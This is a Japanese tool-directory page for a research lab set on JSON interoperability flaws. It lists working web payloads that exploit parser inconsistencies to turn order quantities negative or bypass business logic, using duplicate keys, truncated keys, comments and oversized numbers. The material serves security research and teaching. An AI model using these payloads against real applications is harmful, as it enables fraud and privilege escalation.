Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
json-interop-vuln-labs — "JSON相互運用性の脆弱性の探求"のコンパニオンラボ | Kitploit
ツール/GitHubGitHub/bishopfox/json-interop-vuln-labs
脆弱性分析ウェブアプリケーション悪用ウェブセキュリティ学習と教育ラボと実践
GitHubbishopfox/json-interop-vuln-labs

json-interop-vuln-labs

"JSON相互運用性の脆弱性の探求"のコンパニオンラボ

リポジトリを見る
210193年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
ウェブサイト

JSON相互運用性の脆弱性ラボ

説明

これらは、私の調査記事「JSON相互運用性の脆弱性の探求」に付随するラボです。

ラボ1: Eコマースアプリケーションにおける無料購入

  • キー衝突攻撃: 一貫性のない重複キーの優先順位
  • 一貫性のない大きな数値の表現

ラボ2: マルチテナントアプリケーションにおける権限昇格

  • キー衝突攻撃: 文字の切り捨て

これらのラボは、デフォルトでホストのポート5000〜5004にバインドされます。

攻撃手法

1. キー衝突

一貫性のない重複キーの優先順位

root@kitploit:~
{"qty": 1, "qty": -1}

文字の切り捨て

最後のキー優先パーサーにおける切り捨て(最初のキー優先の場合は順序を逆にする)

root@kitploit:~
{"qty": 1, "qty\<raw \x0d byte here>": -1}
{"qty": 1, "qty\ud800": -1} # Any unpaired surrogate U+D800-U+DFFF
{"qty": 1, "qty"": -1}
{"qty": 1, "qt\y": -1}

コメントの切り捨て

これらのドキュメントは、コメントと引用符なし文字列のサポートが一貫していないことを悪用します:

root@kitploit:~
{"qty": 1, "extra": 1/*, "qty": -1, "extra2": 2*/}
{"qty": 1, "extra": a/*, "qty": -1, "extra2": b*/}
{"qty": 1, "extra": "a/*", "qty": -1, "extra2": "b"*/}
{"qty": 1, "extra": "a"//, "qty": -1}

2. 数値のデコード

一貫性のない大きな数値のデコード

これらの大きな数値は文字列(例: "+Infinity")に変換される可能性があり、型の取り違え(type juggling)による脆弱性につながる可能性があります。あるいは、MAX_INT/MIN_INT、丸められた値、または0に変換されることで、ビジネスロジックのバイパスを許す可能性があります。

root@kitploit:~
{"qty": 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999}
{"qty": -999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999}
{"qty": 1.0e4096}
{"qty": -1.0e4096}

著者

Twitter: @theBumbleSec

GitHub: the-bumble

ツールをダウンロード